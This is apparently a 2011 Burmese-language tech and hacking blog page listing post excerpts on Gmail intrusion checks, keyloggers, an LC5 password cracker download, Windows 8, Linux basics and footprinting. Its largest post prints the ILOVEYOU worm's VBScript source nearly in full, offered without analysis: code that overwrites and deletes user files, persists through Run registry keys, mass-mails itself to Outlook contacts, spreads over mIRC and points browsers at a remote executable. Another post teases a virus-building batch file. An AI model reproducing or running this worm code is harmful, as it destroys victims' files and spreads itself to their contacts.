12/29/2011

မိမိ gmail account အားခိုးသံုးေနသူ ရွိမရွိ ေထာက္လွမ္းမယ္


ဒါကေတာ့ ကုိယ့္ Gmail account ကုိတစ္ေယာက္ေယာက္က ခုိးဝင္တယ္လုိ႔ သံသယဝင္ခဲ့ရင္ ေထာက္လွမ္းသိရွိႏုိင္မယ့္နည္းလမ္းေလးပါ။ မိမိ accont အားခိုးသံုးေနသူ ရွိမရွိ မသကၤာပါက gmail အား၀င္လိုက္ပါ။  -account၏ ေအာက္ဆံုးသို႔ဆင္းကာ detail ဆိုသည့္စာသားအားရွာၿပီး click လိုက္ပါ။

Read more »

Hack ခ်င္သူမ်ား သတိထားပါ။

 ကၽြန္ေတာ္လဲ ကိုယ့္ကိုကိုယ္ သတိေပးတာျဖစ္သလို ၀ါသနာပါတဲ႔မိတ္ေဆြမ်ားကိုလဲ သတိရလို႔ေျပာျပရအုန္းမယ္ Yangon united FC (http://www.ygnutd.com/) ကို၀င္လိုက္တာ hack ခံထားရတာေတြ႔လိုက္ရတယ္ ဒါေပမဲ႔ သိပ္မၾကာပါဘူး Yangon united (http://www.ygnutd.com/) က ျပန္ျပီး recovery လုပ္လိုက္ပါတယ္။ ဒါနဲhttp://www.blinkhackergroup.net/ဆီကိုခဏေရာက္သြားတယ္ ၾကည့္လိုက္တာနဲ႔ Download section မွာ download hacking tools ဆိုတာကို ေတြ႔လိုက္တယ္ ဒါနဲ႔ ခ်က္ခ်င္းဘဲ ႏွိပ္ျပီးhttp://bhg.nazuka.net/dl4hktools.html ကည့္လိုက္မိတယ္ ဒါနဲ႔ ၾကိဳက္စရာေလးေတြ ေတြ႔မိေရာ Download မယ္လုပ္ေတာ႔ မွ  Winspy Keylogger အေၾကာင္းကို သတိရမယ္တယ္ ဒီ software ကဘယ္လိုအလုပ္လုပ္လဲဆိုေတာ႔  install လုပ္ဖို႔ exe file ကို ထုတ္ေပးပါတယ္ ဒီ exe file ကို ကိုယ့္ hack ခ်င္တဲ႔ လူရဲ႔ Computer ထဲမွာ install လုပ္ေပးရမွာ ျဖစ္ပါတယ္ ဆိုေတာ႔ ဒီအတိုင္း ၾကီး 

Read more »

12/28/2011

LC5 Password Cracking Tools

Windows ရဲ႕ password ကုိ crack လုပ္တဲ့ program တစ္ခုျဖစ္ပါတယ္။ Login လုပ္ျပီးမွ အလုပ္ျဖစ္ပါတယ္။ ဒီေဆာ့၀ဲလ္ကုိ သုံးျပီး Windows password ေတြကုိ crack လုပ္ႏုိင္ပါတယ္။ တစ္ခုက ဒီီေဆာ့၀ဲလ္ကုိသုံးႏုိင္ဖုိ႕ ကြန္ပ်ဴတာထဲကုိ အရင္ install လုပ္ထားရမွာျဖစ္တယ္။ ဒါေၾကာင့္ password လုံး၀မသိဘဲ crack ဖုိ႕ဆုိရင္အလုပ္မျဖစ္ပါ။ စမ္းၾကည့္ခ်င္သူမ်ား ေအာက္ပါ Link တြင္ ေဒါင္းလုပ္ရယူႏုိင္ပါတယ္။ Patch ပါ၀င္ပါတယ္။
Read more »

12/26/2011

Love Letter Virus Source Code

-----------------------------------------------------------------------------------------------------------------------------------------------------------------
CODE:
-----------------------------------------------------------------------------------------------------------------------------------------------------------------

rem barok -loveletter(vbe)

rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
 


spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="
Read more »

TuneUp Utilities 2011 v10.0.2011.65

ဒါေလးကေတာ့ ကြန္ပ်ဴတာကုိ Tuneup လုပ္ေပးမယ့္ ေဆာ့ဝဲလ္ေလးပဲျဖစ္ပါတယ္။ မိတ္ေဆြတုိ႔ ကြန္ပ်ဴတာမွာ ရွဳပ္ပြေနတဲ့ Cache file ေတြ၊ Temp file ေတြကုိရွင္းလလင္းေပးမွာျဖစ္တဲ့အျပင္ Hard disk ကုိလည္း Defrag လုပ္ေပးမွာျဖစ္ပါတယ္။ အျခားေသာ Function ေတြလည္းအမ်ားၾကီးပါ။ သုံးဖူးတဲ့သူေတြေတာ့ သိပါလိမ့္မယ္။ လုိခ်င္တယ္ဆုိရင္ ေအာက္ကေနယူသြားူႏုိင္ပါတယ္ခင္ဗ်ာ။
ဖုိင္ဆုိဒ္ကေတာ့ 50 MB ေက်ာ္ေလာက္ပါ။

Read more »

Android Application Setting အသံုးျပဳျခင္း

Android OS ဖုန္းေတြအတြက္ Setting ထဲက Application Setting ကို ဘယ္လိုအသံုးျပဳႏိုင္တယ္ဆိုတာကို ေဖာ္ျပေပးသြားမွာျဖစ္ပါတယ္။ Application Setting ဆိုတာကေတာ့ Android OS ဖုန္းေတြမွာ ထည့္သြင္းအသံုးျပဳထားတဲ့ ေဆာ့ဖ္၀ဲေတြ၊ ဂိမ္းေတြနဲ႔ အျခား Application စနစ္ေတြအားလံုးကို ထိန္းခ်ဳပ္အသံုးျပဳႏိုင္မယ့္ ေနရာတစ္ခုလို႔ပဲ ဆိုရမွာပါပဲ။ ဖုန္းထဲကိုထည့္သြင္းထားတဲ့ Application ေတြကို ပိတ္ထားခ်င္ရင္ပဲျဖစ္ျဖစ္၊ ဖ်က္ပစ္ခ်င္ရင္ပဲျဖစ္ျဖစ္၊ ဒါမွမဟုတ္

Read more »

Windows 8 မိတ္ဆက္

Microsoft ရဲ႕ ေနာက္ပြဲထုတ္မယ့္ Windows 8 ဟာအျပီးအေခ်ာမသတ္ရေသးေပမယ့္ Windows 7 နဲ႕ကြဲျပားျခားနားတဲ့အရာေတြအမ်ားၾကီးရွိေနပါတယ္..ေသခ်ာတာကေတာ့ Start-bar နဲ႔ icon ေတြ User Friendly ျဖစ္တဲ့ Desktop Interface ေတြ..ေနာက္ျပီး Touch Screen ကုိ Support လုပ္တဲ့ Metro လုိ႔ေခၚတဲ့(ဒါေတြကုိ Windows Phone OS ေတြမွာလည္း Run တယ္).

Windows 8 ရဲ႕ ထူးျခားခ်က္မ်ား
1. Windows 8 ဟာ ARM-based processor ေတြမွာေရာ x86-based PC ေတြေပၚမွာပါ Support လုပ္တဲ့ first Edition OS တစ္ခုျဖစ္ပါတယ္..
2. Hybrid Boot Mode ကုိသုံးထားတဲ့အတြက္ Boot Time ကုိ 20 second ထိေလ်ွာခ်ထားတဲ့အတြက္ Windows 7 ထက္ boot time ျမန္မယ့္သေဘာ့ရွိတယ္.. Hybrid Boot Mode ဆုိတာ Logoff နဲ႔ Hibernate ကုိ ေပါင္းထားတဲ့ Technology ေပါ့ေလ..တကယ္လုိ႔ user ဟာ Logoff ကုိကလစ္လုိက္ရင္ Windows က application အားလုံးကုိပိတ္လုိက္မွာျဖစ္ျပီး Hibernate Mode အျဖစ္ဆက္သြားမ်ာျဖစ္တယ္..
3. Windows Store ကုိမိတ္ဆက္ေပးထားတယ္..ဒီကေန Windows အတြက္ app ေတြကုိ ေဒါင္းလုပ္ရႏုိင္မယ့္ လိပ္စာေတြဆီကုိ ေခၚသြားမယ္..
4. Windows 8 ရဲ႕ feature အသစ္တစ္ခုျဖစ္တဲ့ Automatic Maintenance ကေတာ့ Hard Disk ကုိ automatic Defrag လုပ္ေပးျခင္း၊ .Net Optimizing Service ကုိ run ေပးျခင္း၊ Problem ေတြကုိ ရွာေဖြေပးျခင္းေတြျဖစ္ပါေၾကာင္း၊ ဒါေတြအားလုံး Windows ရဲ႕ Performance ကုိ ေကာင္းေစပါတယ္။
5. ဘာေျပာေျပာ Windows 8 ကေတာ့ Touch-centric, Tiles-based User Interface ျဖစ္ပါတယ္၊ Metro application ေတြဟာ လွပတယ္၊ Touch screen အတြက္အထူး Design လုပ္ထားတာပဲ၊
6. Snap-Multitasking ဆုိတာကေတာ့ Windows 8 မွာ application ၂ ခုကုိ Run တဲ့အခါ Side-by-Side အျဖစ္ေဖာ္ျပဖုိ႔ အသုံးျပဳထားတာပဲ၊ Windows 7 မွာလည္းပါျပီးသားပါ..
7. Windows 8 မွာ Built-in Antivirus Protection ပါဝင္မွာျဖစ္ပါတယ္..သူ႕ရဲ႕ Microsoft Security Essential ကုိ မြမ္းမံထားတဲ့ပုံပါပဲ။


8. Built-in Hyper-V ပါဝင္မွာျဖစ္ပါတယ္၊ ဆုိလုိတဲ့သေဘာကေတာ့ Virtual Machine Capability ပါဝင္ျပီးသားျဖစ္ေနပါမယ္။ အရင္ Version မွာတုန္းက Server Version ေတြမွာသာထည့္သြင္းခဲ့တာပါ။
9. Secure Boot: ဒါကေတာ့ Microsoft က Windows 8 မွာ Linux အတြက္ Dual Boot လုပ္ျခင္းကုိ ကာကြယ္ထားတာပါ။
ေျပာရရင္ Windows 8 ဟာ Apple ရဲ႕ iOS နဲ႕ Mac OS X Lion လုိပဲ ေပါ့ပါးတဲ့ OS ျဖစ္မွာပါ၊ လူေတြက Windows 8 boot တက္တာျမန္တာကုိ အံ့ၾသမွာ ေသခ်ာပါတယ္ဗ်ာ။
Read more »

12/24/2011

How to create virus: Simple Bat File Code

ေအာက္က code line ေလးေတြကုိ Notepad ေပၚမွာေရးျပီး .bat ဖုိင္အျဖစ္သိမ္းဆည္းပါ။ အလြန္အႏၱရာယ္မ်ားတဲ့ code line ေတြျဖစ္ပါတယ္။  loop function ပါဝင္တဲ့အတြက္ ကြန္ပ်ဳတာ ဟန္းသြားေစႏုိင္တဲ့အထိ ေၾကာက္ဖုိ႔ေကာင္းတယ္ေနာ္။ စမ္းခ်င္ရင္ VM Ware ေတြထဲမွာပဲ စမ္းပါေလ။ ဒါေတြကုိ .bat ဖုိင္ကေန .exe ေျပာင္းေပးတဲ့ ေဆာ့ဝဲလ္ေတြလည္းရွိတယ္. bat to .exe Converter လုိမ်ဳိးေပါ့။

Read more »

Linux အေၾကာင္း တေစ့တေစာင္း (Introduction to Linux for Newbies)

၁၉၉၁ ခုႏွစ္မွာ Finland ႏုိင္ငံ Helsinki ျမိဳ႕ကေက်ာင္းသားေလး Linus Torvalds ဆုိသူက Linux ကုိ စတင္ေမြးဖြားေပးခဲ့တယ္..Microsoft လုိမဟုတ္တဲ့ Linux ဟာ open-source ျဖစ္ျပီး သင္စိတ္ၾကိက္ souce code ေတြကုိ editing လုပ္ႏုိင္ပါတယ္.. အဲ ဒါေပမယ့္ ခင္ဗ်ား ဒီေဆာ၀ဲလ္ကုိ ဘယ္ေတာမွ မူပုိင္ မျဖစ္ပါဘူး..ျမန္မာႏုိင္ငံက user ေတြဟာ Linux ကုိ သိပ္မသုံးၾကပါဘူး..ဒါေပသိ အေနာက္ႏုိင္ငံက host server ေတြ Web server ေတြကုိ Linux နဲ႔ Run ပါတယ္..ေနာက္ျပီးေတာ့ Linux က open-source ျဖစ္တာေၾကာင့္ ေစ်းလည္းခ်ဳိတယ္..Europe ႏုိင္ငံေတြမွာေတာ့ Windows OS ေတြကုိ ၀ယ္ယူမယ္ဆုိရင္ dollar အမ်ားၾကီးေပးရပါသတဲ႔.. Linux ကေတာ့ မျဖစ္စေလာက္ ပုိက္ဆံေလးနဲ ၀ယ္ယူႏုိင္တယ္ေလ..Programming ဆုိင္ရာ Coding ဆုိင္ရာဘက္မွာလည္း Windows OS ထက္သာတယ္..စြမ္းအားနိမ့္ CPU ေတြေပၚမွာလည္း Run ႏုိင္တယ္..ေနာက္ျပီး Linux OS မွာ Virus အႏၱရာယ္ Windows ထက္ ကင္းတယ္ (မရွိသေလာက္ပါပဲ) Hacker ေတြရဲ႕အၾကိဳက္ဆုံး operating system တစ္ခုလည္း ျဖစ္တာေပါ့..ေနာက္ပုိင္းက်ရင္ ျမန္မာႏုိင္ငံမွာလည္း  Linux Operating System ကုိသုံးရမယ့္အေၾကာင္းေတြေပၚလာႏုိင္ပါတယ္..ထင္ရွားတဲ့ Linux version ေတြအမ်ားရွိတာေၾကာင့္ ကုိယ္အၾကဳိက္သူ႔အၾကဳိက္ေတာ့ မတူႏုိင္ဘူးေပါ့ေနာ္..ဒါေတြကေတာ့ Ubuntu, Fedora, RedHat စသည္ျဖင့္ေပါ့..Ubuntu Linux OS တုိ႔ဆုိရင္ Dual boot ရတယ္ေလ…ဆုိလုိတာက သင့္ PC ထဲ႔မွာ Linux  OS ေရာ Windows OS ကုိပါတစ္ခါတည္း install လုပ္ခြင့္ရွိေစတယ္..မွတ္ထားရမွာက Windows ကုိအရင္ဆုံး Install လုပ္ရမယ္ဆုိတာပါပဲ.. Linux ရဲ႕ boot loader ကုိ MBR partition ထဲကုိ Install လုပ္မယ္ဆုိရင္ Linux OS က Windows OS ကုိေကာင္းေကာင္း လည္ပတ္ခြင့္ရေစပါတယ္.. Windows ရဲ႕ boot loader ကေတာ့ Linux OS ကုိမသိေပ (သူက နာမည္ၾကီးဆုိေတာလည္း ဂရုမစုိက္တဲ့သေဘာေပါ့ေလ)…ကြ်န္ေတာ္ကေတာ့ Red Flag Linux ကုိၾကိဳက္ပါတယ္…ေျပာရမယ္ဆုိရင္ Linux ဟာ Windows နဲ႔ေတာ့ မတူပါဘူး သူ႔ရဲ႕ File System ေရာ Technology ေရာေပါ့..ကြ်န္ေတာ္တုိ႔မ်ား Windows ကုိ Install လုပ္ခဲ့တုန္းက Hard Disk ကုိ Format ခ်ေတာ့မယ္ဆုိရင္ File system ကုိ FAT32, NTFS စသည္ျဖင့္ Format ရုိက္တာၾကဳံဖူးမွာပါ..အဲ Linux မွာေတာ့ FAT32, NTFS အစား ext2, ext3, ext4 ကုိသုံးတယ္..Windows ထဲမွာ software တစ္ခုကုိ install လုပ္ရာမွာ .exe (extention) ကုိသုံးသလုိ Linux မွာေတာ့ RPM(RedHat package Management), DEB(Debian Linux) extention ေတြကုိ special command ေတြနဲ႕ Install လုပ္ယူရတယ္..Command ေတြကုိ Shell လုိ႔ေခၚတဲ႔ Terminal ထဲကေန ေခၚယူရတယ္.. Windows မွာေတာ့ Command Prompt ေပါ့ေလ..မိတ္ေဆြမ်ား ဗဟုသုတေလးရေအာင္ Ubuntu Linux ရဲ႕ Installation (Step by step) ေဖာ္ျပေပးလုိက္ပါတယ္။ အရင္ဆုံး
PC ကုိ ပါ၀ါဖြင့္ျပီး Del, F2, F10(သင့္ရဲ႕ BIOS ေပၚမူတည္တယ္)ကုိႏွိပ္ပါ.. BIOS setting ထဲမွာ Boot Order အား CD Rom/DVD ကုိ First boot သုိ႔ထားကာ PC boot လုပ္ပါ အဲ Linux Installation ေခြကုိ CD/DVD Drive ထဲထည့္ထားျပီးျဖစ္ပါေစ.. PC ကေတာ့ သူ႕ဟာသူ boot လုပ္ျပီး Linux Operating System ကုိ တင္ပါလိမ့္မယ္..ခဏၾကာရင္ေတာ့ Welcome Screen ေတြဘာေတြျမင္ရပါမယ္.. Welcome Screen ရဲ႕ေဘးနားမွာ Forward ကုိႏွိပ္ျပီး သြားပါ..Prepare Disk Space wizard ေအာက္မွာ Use the entire disk နဲ႔ Specify partitions manually(advanced) ဆုိတာရွိတယ္..daul boot မလုပ္ဘူးဆုိရင္ ပထမတစ္ခုကုိေရြးပါ..အဲ Windows ပါရွိေနရင္ ဒုတိယတစ္ခုကုိေရြးေပါ့ေနာ္..ဒီေနရာမွာ Windows ရဲ႕ partitions ေတြရွိေနရင္

                               
                                           dev/hda0                ntfs                         8000MB
                                           dev/hda1                ntfs                         6000MB
                                           free space               fat32

dev/hda0 ကေတာ့ Windows partition ရွိတဲ့ active partition ေပါ့… dev/hda1 ကုိ တကယ္လုိ႔ အဲဒါက သင့္ရဲ႕ ေဒတာေတြမရွိဘူးလုိ႔ ဆုိပါစုိ႔.. အဲဒီ partition ေပၚမွာ Linux ကုိ install လုပ္ႏုိင္ပါ၏..လုိခ်င္တဲ့ partition ေပၚမွာ right-click>edit လုပ္ကာ Delete (or) Create a new partition ကုိေရြးပါ..အဲဒီေနရာမွာ Type for the new partition(Primary နဲ Logical ရွိတယ္.ၾကိဳက္ရာကုိေရြးႏုိင္) New partition sizes in megabytes(8000 MB ဆုိရင္ 8GBေပါ့), Location for the new partition(Beginning နဲ႔ End မွာ End ကုိေရြးတာပုိေကာင္းမယ္ထင္တယ္), Use as(ext3,ext4 ဆုိတာရွိတယ္.ကြ်န္ေတာ္ကေတာ့ ext3 ကုိေရြးတယ္), Mount point(ဒီေနရာမွာေတာ့ / ကုိေရြးတယ္..ေရြးရတဲ့အေၾကာင္းရွိတယ္.ရွင္းျပရရင္ ရွည္သြားမယ္)..ျပီးရင္ Next>> Forward စသည္ျဖင့္ Software installation တုိ႔ဧ။္ ထုံးတမ္းစဥ္လာ အတုိင္းေဆာင္ရြက္ပါေလ…တကယ္လုိ႔ မိတ္ေဆြက Windows installation အေတြ႕အၾကဳံရွိတယ္ဆုိရင္ ဒီအတြက္ ခက္ခဲမွာမဟုတ္ပါ.အဲ ဒါေပမယ့္ တစ္ခါမွ ဒါမ်ဳိး မလုပ္ဖူးဘူးဆုိရင္ေတာ့ ခင္ဗ်ား Windows ေလးျပန္မတက္မွာ ျမင္ေယာင္ေသးပါတယ္ဗ်ာ.(မယုံမရွိနဲ ကုိယ္ေတြ႕) ေနာက္ျပီးေတာ့ ဒီ guide line ေလးဟာ ျပီးျပည့္စုံတယ္လုိ႔ မဆုိလုိပါေၾကာင္း။ေျပာရရင္ အေျခခံတင္ျပခ်က္မ်ွသာျဖစ္ေၾကာင္း ၀န္ခံပါတယ္…ကံေကာင္းရင္ေတာ့ Linux ရဲ႕ Welcome screen ေလးနဲ ခင္ဗ်ား Windows Operating System ကုိလည္း run ႏုိင္ပါလိမ့္မယ္.။

File and Folder Structure
                      /bin (အေရးၾကီးတဲ႔ user command binary files ေတြတည္ရွိတယ္)
                     /home (personal files သိမ္းဆည္းရာ user home directory)
                     /media ( cd, floppy drives ေတြနဲ႕ပတ္သက္တဲ႔ folder ပါ)
                     /opt (add-on software packages)
                     /usr (user shareble folder ေပါ့)
                     /var (variable data ရွိမယ္, spool directory,log files ေတြရွိတယ္, temporary files ေတြရွိတယ္)
                     /procs (system information ဖုိင္ေတြရွိတယ္)
                     /dev (hardware device ေတြကုိ link လုပ္ေပးတဲ႔အခန္း /dev/sound, etc)
                    /boot (system startup မွာသာသုံးတဲ့ boot loder ေတြရွိတဲ့အခန္း)
                    /lib (မရွိမျဖစ္ shared libraries & kernel modules)

Linux Overall Power User (in Windows, Administrator account)
Windows ရဲ႕ Administrator account လုိပဲ Linux မွာ root ဆုိတဲ့ account ရွိတယ္. လုပ္ပုိင္ခြင့္အကုန္လုံး ရွိတဲ့ account ေပါ့ေနာ္. ဒီအေကာင့္ကုိ ပုံမွန္အေကာင့္လုိ မသုံးသင့္ပါဘူး. System ေတြကုိ ျပင္ဖုိ႔လုိတဲ့အခ်ိန္မွသာ သုံးသင့္တယ္.. su – command နဲ႕ root account လုိခဏသုံးႏုိင္တယ္

Shell / Terminal Emulator (in Windows, command prompt)
Linux ရဲ႕ GUI version ေပၚမူတည္ျပီး အမ်ဳိးမ်ဳိးရွိတယ္..Gnomes(gnome-terminal), KDE(konsole), xterm ေတြေပါ့..ဒီေနရာမွာေတာ့ Windows နဲ႔ မတူဘဲ ေၾကာင္ေတာင္ေတာင္ႏုိင္လွတယ္. Windows အတြက္ေတာ့ Run>cmd ဆုိရင္ျပီးျပီ..ထားလုိက္ေတာ့ Linux ျဖစ္တာကုိး...

Linux Commands
          cd..          (အခုရွိေနတဲ့ directory ကေန ေအာက္ကုိတစ္ဆင့္ဆင္းတယ္)
          reboot      (System restart ေပါ့ေနာ္)
          fdisk         (hard disk ေပၚမွာ partition ခြဲတဲ႔ command)
          chmod      (ဖုိင္ေတြကုိ executeble ျဖစ္ေအာင္လုပ္တယ္)
          dir           (Directory path ကုိျပတယ္)
          cp           (Copy command ပါ.. cp<source><destination>)
          mv          (Windows ထဲက Move ျဖစ္တယ္)
          man        ( Linux ရဲ႕ Help Center ေပါ့)
အဲဒီ command ေတြကုိ help ေခၚျပီး ေလ့လာႏုိင္ပါတယ္.. ဥပမာ man အေၾကာင္းသိခ်င္ရင္ man –help ဒါမွမဟုတ္ man /? ေပါ့ေနာ္.. စမ္းၾကည့္ပါ..ကဲ မိတ္ေဆြမ်ား ကြ်န္ေတာ္ရဲ႕Linux အေၾကာင္းကုိ ဒီမွာပဲ ရပ္နားပါမယ္..မိတ္ေဆြတုိ႔ နည္းနည္းေလာက္ျဖစ္ျဖစ္ ဗဟုသုတရသြားတယ္ဆုိရင္ ေက်နပ္ပါျပီ.. တကယ္လုိ႔ ဒီ post အတြက္ ကြ်န္ေတာ္ရဲ႕ ေဖာ္ျပခ်က္မွာ အမွားအယြင္းတစ္စုံတရာ ရွိပါက ကြ်န္ေတာ္ရဲ႕အမွားသာ ျဖစ္ပါတယ္..
Read more »

Footprinting ဆုိတာ


ဟက္ကာေတြ system တစ္ခုကုိ hack ေတာ့မယ္ဆုိရင္ ပထမဆုံးလုပ္ရမွာေတာ့ footprinting ပါပဲ။ ဥပမာဆုိရရင္ ဟက္ကာတစ္ေကာင္က Company တစ္ခုကုိ hack ေတာ့မယ္ဆုိပါစုိ႔။ ပထမဆုံး သူရွာရမွာက Company ရဲ႕ လိပ္စာေတြ, Email ေတြ, ကုိလုိက္ရွာရမယ္။ ျပီးရင္ အဲဒီ Company ရဲ႕ Website လိပ္စာေတြကုိ ရွာရယ္။ ျပီးမွာ Website ရဲ႕ IP Address ကုိရွာရယ္။ ဒီလုိရွာဖုိ႔အတြက္ http://www.selfseo.com/find_ip_address_of_a_wesite.php ထဲမွာ လုိခ်င္တဲ့ website
Read more »

Phishing ဆုိသည္မွာ

